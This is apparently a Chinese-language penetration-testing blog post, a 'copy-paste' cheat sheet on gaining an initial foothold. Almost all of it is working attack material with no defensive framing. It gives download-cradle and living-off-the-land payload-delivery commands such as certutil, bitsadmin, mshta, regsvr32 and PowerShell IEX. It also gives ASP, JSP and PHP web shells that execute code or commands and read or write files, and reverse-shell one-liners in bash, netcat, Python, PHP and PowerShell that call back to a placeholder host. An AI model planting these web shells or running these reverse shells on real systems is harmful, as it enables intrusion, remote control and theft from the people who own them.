边界突破


漏洞挖掘

文件下载

Http

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000

Curl

curl http://example.com/File -o File

Wget

wget http://example.com/File -O File

Certutil

echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete

Bitsadmin

bitsadmin /transfer job http://example.com/File C:\Users\Public\File

PowerShell

powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))

WebShell

ASP

  • 代码执行
<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>
  • 命令执行
<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd")).stdout.readall %>
<%= Server.CreateObject("Shell.Application").ShellExecute("cmd.exe","/c "&request("cmd"),"","open",0) %>
  • 文件操作
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),1,False).Readall %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),2,True).WriteLine(request("data")) %>

JSP

  • 代码执行
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("code")); %>
<% new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("url"))}).loadClass(request.getParameter("class")).newInstance(); %>
  • 命令执行
<% Runtime.getRuntime().exec(new String[]{"bash","-c",request.getParameter("cmd")}); %>
<% new ProcessBuilder(new String[]{"bash","-c",request.getParameter("cmd")}).start(); %>
  • 文件操作
<% for(java.io.File name:new java.io.File(request.getParameter("dir")).listFiles()){out.println(name+"<br>");} %>
<% new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("file")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("data"))); %>
<%@ page import="java.io.FileInputStream" %><% FileInputStream File=new FileInputStream(application.getRealPath("/")+request.getParameter("file"));int Temp=0;while((Temp=File.read())!=-1){out.print((char)Temp);}File.close(); %>

PHP

  • 代码执行
<?php @eval($_REQUEST['code']); ?>
<?php @assert($_REQUEST['code']); ?>
<?php $main=@create_function('',$_REQUEST['code']);$main(); ?>
<?php @call_user_func($_REQUEST['func'],$_REQUEST['code']); ?>
<?php @array_map($_REQUEST['func'],array($_REQUEST['code'])); ?>
  • 命令执行
<?php @system($_REQUEST['cmd']); ?>
<?php @passthru($_REQUEST['cmd']); ?>
<?php echo @exec($_REQUEST['cmd']); ?>
<?php echo @shell_exec($_REQUEST['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array('-c',$_REQUEST['cmd'])); ?>
<?php $x=@popen($_REQUEST['cmd'], "r");echo stream_get_contents($x);pclose($x); ?>
<?php $x=@proc_open($_REQUEST['cmd'],array(1=>array("pipe","w")),$y);echo stream_get_contents($y[1]);proc_close($x); ?>
  • 文件操作
<?php echo @file_get_contents($_REQUEST['file']); ?>
<?php echo @implode('<br>',scandir($_REQUEST['dir'])); ?>
<?php @file_put_contents($_REQUEST['file'],base64_decode($_REQUEST['data'])); ?>

反弹Shell

TTY

python -c 'import pty; pty.spawn("/bin/bash")'

PHP

php -r '$sock=fsockopen("x.x.x.x",yyyy);exec("/bin/bash -i <&3 >&3 2>&3");'

Bash

bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1

Ncat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc x.x.x.x yyyy >/tmp/f

Mshta

mshta http://example.com/shell.hta

Python

python -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",yyyy));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

Msiexec

msiexec /q /i http://example.com/shell.msi

Regsvr32

regsvr32 /s /n /u /i:http://example.com/shell.sct scrobj.dll

Rundll32

rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("shell");window.close();

PowerShell

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://example.com/shell')"
powershell -nop -c "$TCP=New-Object System.Net.Sockets.TCPClient('x.x.x.x',yyyy);$CMD=$TCP.GetStream();[byte[]]$Bytes = 0..65535|%{0};while(($I=$CMD.Read($Bytes,0,$Bytes.Length)) -ne 0){$Send=[Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$I) 2>&1 | Out-String)+'PS '+(pwd).Path+'> ');$CMD.Write($Send,0,$Send.Length);$CMD.Flush()};$TCP.Close()"

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
信息收集 信息收集
╔═══════════════╗
║ “复制粘贴” 之信息收集 ║
╚═══════════════╝
2021-03-10
下一篇 
系统提权 系统提权
╔═══════════════╗
║ “复制粘贴” 之系统提权 ║
╚═══════════════╝
2021-03-05
  目录